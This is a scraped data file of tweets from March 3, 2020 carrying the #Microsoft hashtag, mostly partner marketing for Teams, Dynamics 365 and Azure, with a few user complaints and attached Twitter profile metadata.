    <t>{'id': 26478237, 'id_str': '26478237', 'name': 'Kenneth Meyer', 'screen_name': 'kenmeyer', 'location': 'Minneapolis MN', 'description': 'Sr. Consultant Owner - KdmConsulting\nCentral Region Chair - IAMCP-US Board of Directors', 'url': 'https://t.co/BKql0Kcmeh', 'entities': {'url': {'urls': [{'url': 'https://t.co/BKql0Kcmeh', 'expanded_url': 'https://twitter.com/kenmeyer', 'display_url': 'twitter.com/kenmeyer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 222, 'friends_count': 140, 'listed_count': 6, 'created_at': 'Wed Mar 25 11:45:49 +0000 2009', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 822,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'http://pbs.twimg.com/profile_images/964899058199523328/qWXA1hTf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/964899058199523328/qWXA1hTf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26478237/1518884816',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</si>
  <si>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Tue Mar 03 16:25:53 +0000 2020</t>
  </si>
  <si>
    <t>Check out this great blog series by @mmukalian for some tips for automating provisioning and managing guest access for #microsoft teams with #powerapps #powerautomate #microsoftteams https://t.co/pzPWv0MvE9</t>
  </si>
  <si>
    <t>Tue Mar 03 16:25:31 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/YU3XD9KXKZ</t>
  </si>
  <si>
    <t>Tue Mar 03 16:25:26 +0000 2020</t>
  </si>
  <si>
    <t>Fashion e-retailer Stitch Fix is the algorithm queen, taking #datascience to new heights. With #Microsoft #PowerBI and #Azure, LINC Project can help you bring powerful #AI insights into your company. https://t.co/LZsCS7QRSb</t>
  </si>
  <si>
    <t>{'id': 2447970636, 'id_str': '2447970636', 'name': 'LINC Project', 'screen_name': 'LINCProject', 'location': '', 'description': 'LINC Project listens to companies and organizations that have Information Technology-related needs in New York.', 'url': 'http://t.co/I6rbjhsYVL', 'entities': {'url': {'urls': [{'url': 'http://t.co/I6rbjhsYVL', 'expanded_url': 'http://www.lincproject.net', 'display_url': 'lincproject.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 44, 'listed_count': 11, 'created_at': 'Wed Apr 16 20:29:42 +0000 2014', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 641,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'http://pbs.twimg.com/profile_images/476660300272259072/WDqfscWS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/476660300272259072/WDqfscWS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2447970636/1432907357',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</si>
  <si>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16:25:25 +0000 2020</t>
  </si>
  <si>
    <t>Analyze the buyer's journey, use embedded intelligence to focus on priorities, and gain social &amp;amp; survey insights by #selling with #Microsoft #Dynamics365. Learn more from Compuville Systems. https://t.co/kRsGTQUdax</t>
  </si>
  <si>
    <t>Tue Mar 03 16:25:13 +0000 2020</t>
  </si>
  <si>
    <t>In the old days, @CliftonCoffeeRoasters had to print, scan, and fill out documents by hand. But since switching to #Teamworksolutions from #Microsoft, their employees work together on documents in a digital workspace. Check out this video for more. https://t.co/5ZaqdjesWl</t>
  </si>
  <si>
    <t>Tue Mar 03 16:25:07 +0000 2020</t>
  </si>
  <si>
    <t>Where does your company rank when it comes to #workplacesatisfaction? Learn what really makes employees happy. More, via @:ChannelE2E   #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/0BNEohwGLw</t>
  </si>
  <si>
    <t>Tue Mar 03 16:24:52 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Communication Square LLC reduces your risk. https://t.co/6EF847taZp</t>
  </si>
  <si>
    <t>{'id': 3172710490, 'id_str': '3172710490', 'name': 'Communication Square', 'screen_name': 'csquareLLC', 'location': 'Florida, USA', 'description': 'Communication Square-Microsoft Gold Partner. Rated as one of Best #IT #Cloud #Support Provider. Specializes in #Azure #Exchange #SkypeforBusiness #SharePoint.', 'url': 'https://t.co/FV3F9hh3Fa', 'entities': {'url': {'urls': [{'url': 'https://t.co/FV3F9hh3Fa', 'expanded_url': 'https://www.communicationsquare.com/', 'display_url': 'communicationsquare.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 193, 'friends_count': 625, 'listed_count': 245, 'created_at': 'Thu Apr 16 12:38:29 +0000 2015', 'favourites_count': 665, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3043,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'http://pbs.twimg.com/profile_images/1085524225941737472/hsW5hFTH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085524225941737472/hsW5hFTH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3172710490/1561125209',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</si>
  <si>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16:24:49 +0000 2020</t>
  </si>
  <si>
    <t>When the time came for the University of Arizona to consolidate their multiple Active Directory domains and modernize their internal network, CatNet, they trusted #Microsoft for a smooth transition and a focus on security. https://t.co/36yw32SCXM https://t.co/ottvAHrn0G</t>
  </si>
  <si>
    <t>Tue Mar 03 16:24:37 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away. Saving you time and creating a better experience for your customers. https://t.co/TpzKZWHrU5</t>
  </si>
  <si>
    <t>{'id': 82914463, 'id_str': '82914463', 'name': 'Tim Crouser', 'screen_name': 'TJCrouser', 'location': 'Lancaster, PA', 'description': '', 'url': 'https://t.co/kgb2coB68y', 'entities': {'url': {'urls': [{'url': 'https://t.co/kgb2coB68y', 'expanded_url': 'http://www.cargas.com', 'display_url': 'cargas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 115, 'friends_count': 142, 'listed_count': 5, 'created_at': 'Fri Oct 16 16:19:39 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 752,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'http://pbs.twimg.com/profile_images/705429090463920129/aDW6NBgF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/705429090463920129/aDW6NBgF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/82914463/1457022687',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</si>
  <si>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16:24:20 +0000 2020</t>
  </si>
  <si>
    <t>Unsure about your ability to meet #GDPR compliance? Thanks to integrations between #Microsoft Cloud App Security and Windows Defender ATP, Sundown Solutions can help. https://t.co/smO1MTzMAX</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/2RjFOIqwIW</t>
  </si>
  <si>
    <t>Tue Mar 03 16:23:13 +0000 2020</t>
  </si>
  <si>
    <t>Is there a way?
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/ex7WR7FYDl</t>
  </si>
  <si>
    <t>Tue Mar 03 16:22:25 +0000 2020</t>
  </si>
  <si>
    <t>62% of SMBs don't have an active cybersecurity strategy in place. Want to make sure that your data is secure, no matter what apps or devices you and your employees are using? Check out the latest security solutions from #Microsoft 365 Business. https://t.co/N6Eil0fqpw</t>
  </si>
  <si>
    <t>Tue Mar 03 16:22:07 +0000 2020</t>
  </si>
  <si>
    <t>The @LinuxFoundation is so open... even to those who sabotage its goals https://t.co/4dOYN9vjNW #microsoft #linux #entryism #proprietarysoftware #infiltration</t>
  </si>
  <si>
    <t>Tue Mar 03 16:21:20 +0000 2020</t>
  </si>
  <si>
    <t>Hey, do you wanna some #joystick or #mouse?
#ibm #microsoft #technology #retrogaming #nerd #retrocomputer #retro #computerhistory #oldtech #retrocomputing #vintage #oldpc https://t.co/7eegFz87NA</t>
  </si>
  <si>
    <t>{'id': 934522572124950528, 'id_str': '934522572124950528', 'name': 'Apulia Retrocomputing - OdV', 'screen_name': 'ApuliaRetro', 'location': 'Bari, Puglia', 'description': "ðŸ‡®ðŸ‡¹Siamo a Bari. Vogliamo fondare un Museo di Storia dellâ€™Informatica e dell'Elettronica.ðŸ’¾ #retrocomputing #retrogaming #retrocomputer", 'url': 'https://t.co/8aDaEwMjis', 'entities': {'url': {'urls': [{'url': 'https://t.co/8aDaEwMjis', 'expanded_url': 'http://www.apuliaretrocomputing.it', 'display_url': 'apuliaretrocomputing.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 51, 'listed_count': 1, 'created_at': 'Sat Nov 25 20:41:58 +0000 2017', 'favourites_count': 1931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1369, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1158126829548576768/3jFwrw7r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158126829548576768/3jFwrw7r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934522572124950528/1511645396',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</si>
  <si>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16:20:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft makes changes to Edge #browser to thwart illicit #miners
#cryptocurrency #crypto 
@UrsBolt @KirkDBorne @ShellyKramer @Xbond49 @jblefevre60 
https://t.co/K0wTVKi9x8</t>
  </si>
  <si>
    <t>{'id': 117780256, 'id_str': '117780256', 'name': 'Efi Pylarinou', 'screen_name': 'efipm', 'location': 'Switzerland', 'description': 'Independent #Fintech &amp; #Blockchain advisor \nNo.1 woman finance influencer #RefinitivSocial100\nTop 14 #Onalytica finance influencer\nCo-founder of Daily Fintech', 'url': 'https://t.co/KbkE4dNwpR', 'entities': {'url': {'urls': [{'url': 'https://t.co/KbkE4dNwpR', 'expanded_url': 'http://www.efipylarinou.com', 'display_url': 'efipylarinou.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8052, 'friends_count': 4176, 'listed_count': 549, 'created_at': 'Fri Feb 26 15:55:45 +0000 2010', 'favourites_count': 8885, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19169, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8499F0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195282385652396033/axe-vhwN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195282385652396033/axe-vhwN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117780256/1555310209', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'D9B17E', 'profile_sidebar_fill_color': 'EADEAA', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 16:20:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Information Protection and Compliance Resources
https://t.co/sXsHwQdrB6</t>
  </si>
  <si>
    <t>{'id': 17471625, 'id_str': '17471625', 'name': 'Daniel Glenn', 'screen_name': 'DanielGlenn', 'location': 'Middle TN', 'description': 'YT: https://t.co/PpgdlWMLgT | Podcast: https://t.co/MhosNhiRMy #365MCS #RE365 @REgarding365 | Microsoft MVP | #SQLFamily | Work @InfoWorkstn | #SPC20 | opin.s mine', 'url': 'https://t.co/LxhmVgO4nr', 'entities': {'url': {'urls': [{'url': 'https://t.co/LxhmVgO4nr', 'expanded_url': 'https://DanielGlenn.com', 'display_url': 'DanielGlenn.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/PpgdlWMLgT', 'expanded_url': 'http://YouTube.com/DanielGlenn', 'display_url': 'YouTube.com/DanielGlenn', 'indices': [4, 27]}, {'url': 'https://t.co/MhosNhiRMy', 'expanded_url': 'http://MessageCenter.Show', 'display_url': 'MessageCenter.Show', 'indices': [39, 62]}]}}, 'protected': False, 'followers_count': 2772, 'friends_count': 544, 'listed_count': 234, 'created_at': 'Tue Nov 18 21:12:44 +0000 2008', 'favourites_count': 2858, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25472,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'http://pbs.twimg.com/profile_images/1183539793071869958/wYKzGFTP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183539793071869958/wYKzGFTP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17471625/1571012851',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</si>
  <si>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16:19:01 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, RIPEVA LLC delivers the data, security and AI you need to build an agile data estate. https://t.co/GfLOWkcGIg</t>
  </si>
  <si>
    <t>{'id': 2332863716, 'id_str': '2332863716', 'name': 'Anna Koshakji', 'screen_name': 'ripevallc', 'location': 'Dubuque, IA', 'description': 'Business Service Consulting Managed Service Provider', 'url': 'https://t.co/bliG2ydUNi', 'entities': {'url': {'urls': [{'url': 'https://t.co/bliG2ydUNi', 'expanded_url': 'http://ripeva.com', 'display_url': 'ripeva.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 170, 'listed_count': 4, 'created_at': 'Sat Feb 08 04:40:57 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2279,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'http://pbs.twimg.com/profile_images/1195442491379597312/ykPyHNM8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195442491379597312/ykPyHNM8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2332863716/1573850676',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</si>
  <si>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16:18:53 +0000 2020</t>
  </si>
  <si>
    <t>Gearing up for a great Productivity Customer Immersion Experience in Atlanta today! #syntechusa #mspartner #Microsoft https://t.co/h8WoYIeg1E</t>
  </si>
  <si>
    <t>{'id': 599578761, 'id_str': '599578761', 'name': 'Synergy Technical', 'screen_name': 'syntechusa', 'location': 'Richmond, VA', 'description': 'Cloud Solutions Made Simple | Microsoft Gold Partner', 'url': 'https://t.co/e2s6ShwyRW', 'entities': {'url': {'urls': [{'url': 'https://t.co/e2s6ShwyRW', 'expanded_url': 'http://www.synergy-technical.com', 'display_url': 'synergy-technical.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 132, 'listed_count': 51, 'created_at': 'Mon Jun 04 19:28:47 +0000 2012', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3919,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'http://pbs.twimg.com/profile_images/1103321899155836930/9fgWnvm6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103321899155836930/9fgWnvm6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/599578761/1551887460',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</si>
  <si>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16:18:26 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/mdlc7NyxzO</t>
  </si>
  <si>
    <t>Tue Mar 03 16:18:25 +0000 2020</t>
  </si>
  <si>
    <t>Where does your company rank when it comes to #workplacesatisfaction? Learn what really makes employees happy. More, via @:ChannelE2E   #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/gFkAxT1ou9</t>
  </si>
  <si>
    <t>Tue Mar 03 16:18:23 +0000 2020</t>
  </si>
  <si>
    <t>I sat with @JP_Courtois from @MicrosoftUK to talk about #AI as a tool to support the #energytransition and providing everyone with clean, affordable and reliable energy.
 #cleantech #aiforgood #innovation #microsoft #energyaccess #sustainability
https://t.co/YqkVlQWFmM</t>
  </si>
  <si>
    <t>{'id': 2313407124, 'id_str': '2313407124', 'name': 'smsantayana', 'screen_name': 'smsantayana', 'location': 'London, England', 'description': 'Commercial Semiotician. Brand-strategist. Data lover. I bring fresh insights to everything I do. Product &amp; Marketing Lead for IoT startup @OrxaGrid', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 127, 'friends_count': 447, 'listed_count': 1, 'created_at': 'Mon Jan 27 10:24:24 +0000 2014', 'favourites_count': 193, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1055838424576466944/HuevVx9J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1055838424576466944/HuevVx9J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2313407124/1543930160',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</si>
  <si>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16:17:31 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus Is Just Beginning.
Congratulations China.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/hVpHOOwviV</t>
  </si>
  <si>
    <t>Tue Mar 03 16:17:28 +0000 2020</t>
  </si>
  <si>
    <t>90% of all garments end up in a landfill. @NatashaFranck, founder of EON, is using #IoT to put an end to the waste with RFID #tech and #Microsoft. What can you do with IoT? https://t.co/LqUsUqc19l</t>
  </si>
  <si>
    <t>{'id': 1181971606127566848, 'id_str': '1181971606127566848', 'name': 'All World Communications', 'screen_name': 'AllWorldCommun2', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Wed Oct 09 16:36:15 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 110, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1182333136820039681/nrK2uv6w_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182333136820039681/nrK2uv6w_normal.png',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</si>
  <si>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16:17:13 +0000 2020</t>
  </si>
  <si>
    <t>New set of features for Microsoft Teams announced. #teams #microsoft https://t.co/wkTEvfMyDi</t>
  </si>
  <si>
    <t>Tue Mar 03 16:17:01 +0000 2020</t>
  </si>
  <si>
    <t>#Firstline Workers are the first to engage customers, the first to see products &amp;amp; services in action, and are the first to represent your brand. With #Microsoft F1 licensing, your workers will be more connected to your company and engaged in its culture.
https://t.co/TJfs72SvPd</t>
  </si>
  <si>
    <t>{'id': 134838901, 'id_str': '134838901', 'name': 'Apex Digital Solutions', 'screen_name': 'ApexEmpowers', 'location': 'Greater Detroit Area', 'description': 'Empowering people and organizations through transformative experiences and solutions to become more secure, productive, and engaged.\n\n5x #mspartner of the Year', 'url': 'https://t.co/jmUDqYBRVN', 'entities': {'url': {'urls': [{'url': 'https://t.co/jmUDqYBRVN', 'expanded_url': 'https://apexdigital.com', 'display_url': 'apexdigital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 351, 'friends_count': 275, 'listed_count': 21, 'created_at': 'Mon Apr 19 15:58:24 +0000 2010', 'favourites_count': 455, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1029,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'http://pbs.twimg.com/profile_images/1214619310599147520/7AdSinBx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214619310599147520/7AdSinBx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134838901/1582555544', 'profile_link_color': '15356B',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</si>
  <si>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16:15:25 +0000 2020</t>
  </si>
  <si>
    <t>I have been hearing more stories lately of #microsoft trying to pay its critics to shut them up.</t>
  </si>
  <si>
    <t>Tue Mar 03 16:15:07 +0000 2020</t>
  </si>
  <si>
    <t>Outlook on the web is now integrated with #Microsoft To Do! Increase your #Productivity with better tracking and organization. Check out @jasonbell's short post to learn how you can #MaxYourCloud with @Office365 &amp;amp; @Outlook: https://t.co/ykatvLqZqv https://t.co/Q6Wo8jxgLd</t>
  </si>
  <si>
    <t>Tue Mar 03 16:14:32 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away. Saving you time and creating a better experience for your customers. https://t.co/hkiWmIM5VC</t>
  </si>
  <si>
    <t>{'id': 54299358, 'id_str': '54299358', 'name': 'Grupo Consultor SICC', 'screen_name': 'gruposicc', 'location': 'MÃ©xico', 'description': 'Empresa lider en consultorÃ­a y asesorÃ­a en tecnologÃ­as de informaciÃ³n en MÃ©xico. Distribuidor de marcas ContPAQi, ESET, Microsoft, HP y Synology', 'url': 'http://t.co/WqIiwflm1r', 'entities': {'url': {'urls': [{'url': 'http://t.co/WqIiwflm1r', 'expanded_url': 'http://www.gruposicc.com.mx', 'display_url': 'gruposicc.com.mx', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 204, 'listed_count': 7, 'created_at': 'Mon Jul 06 19:06:40 +0000 2009', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1398, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D40C1D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/759057862572158976/0TGFFoSG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/759057862572158976/0TGFFoSG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54299358/1469808503', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F2E8D0', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 16:13:02 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 is still #broken thanks to a recent update from #Microsoft  heres how to fix it
#MSFTfail https://t.co/MWsMNWDq0w</t>
  </si>
  <si>
    <t>{'id': 4880396027, 'id_str': '4880396027', 'name': 'Randy T. Bartlett', 'screen_name': 'rtb808pix', 'location': 'Hawaii, USA', 'description': 'Born &amp; Raised in the Hawaiian Islands. Conservation pro since 1988. My 80:20 Rule: 20% of net sales donated to #Hawaii #biodiversity #conservation orgs!', 'url': 'https://t.co/9s37Wsvmxc', 'entities': {'url': {'urls': [{'url': 'https://t.co/9s37Wsvmxc', 'expanded_url': 'http://www.endangeredhawaii.org', 'display_url': 'endangeredhawaii.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1242, 'friends_count': 3799, 'listed_count': 198, 'created_at': 'Sat Feb 06 06:34:17 +0000 2016', 'favourites_count': 16244, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14981,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'http://pbs.twimg.com/profile_images/696785941277507584/SI9BrEdL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/696785941277507584/SI9BrEdL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4880396027/1501223395',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</si>
  <si>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16:12:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to integrate Mixed Reality with #WCOS, reveals new job opening https://t.co/27quG08i4B #mixedreality</t>
  </si>
  <si>
    <t>Tue Mar 03 16:12:20 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/AZ99xH1mbV</t>
  </si>
  <si>
    <t>{'id': 141106211, 'id_str': '141106211', 'name': 'AdriaanVanEeckhoutte', 'screen_name': 'a3aanve', 'location': 'Knesselare, BelgiÃ«', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 109, 'friends_count': 355, 'listed_count': 2, 'created_at': 'Fri May 07 05:54:51 +0000 2010', 'favourites_count': 110, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1355, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DE4300', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1356097043/201003291408101502288836_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1356097043/201003291408101502288836_normal.jpg', 'profile_link_color': '4496C2', 'profile_sidebar_border_color': 'CDBCBC', 'profile_sidebar_fill_color': 'FFF7BF', 'profile_text_color': '783011', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 16:11:22 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/G73sLGv4oF</t>
  </si>
  <si>
    <t>{'id': 1957291170, 'id_str': '1957291170', 'name': 'EMC-23 INC a Communications Company.', 'screen_name': 'ENTMEDC', 'location': 'NEW YORK', 'description': 'EMC-23 INC', 'url': 'https://t.co/yzmUoMhumJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/yzmUoMhumJ', 'expanded_url': 'http://www.emc23inc.com', 'display_url': 'emc23inc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 291, 'friends_count': 2117, 'listed_count': 26, 'created_at': 'Sat Oct 12 19:21:23 +0000 2013', 'favourites_count': 273, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1361,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'http://pbs.twimg.com/profile_images/996434539168739328/-zqxumiu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996434539168739328/-zqxumiu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1957291170/1499170320',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</si>
  <si>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16:11:03 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Tech Team Nation. https://t.co/oC4DL07Iz3</t>
  </si>
  <si>
    <t>{'id': 4534969641, 'id_str': '4534969641', 'name': 'Bob Buyers', 'screen_name': 'YourNewITDept', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Sat Dec 19 11:45:15 +0000 2015', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 499, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/678189624204759040/CuciG18G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/678189624204759040/CuciG18G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4534969641/1452286313',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</si>
  <si>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16:10:40 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft drops #Cortana consumer skills in new Windows 10 update https://t.co/qTMILObEO8</t>
  </si>
  <si>
    <t>Tue Mar 03 16:10:07 +0000 2020</t>
  </si>
  <si>
    <t>Education technology from #Microsoft is changing the way students learn, communicate, and collaborate. Check out how one school district is leveraging #MicrosoftEducation technology to empower their students and teachers to succeed. https://t.co/kAQJs4E7o4</t>
  </si>
  <si>
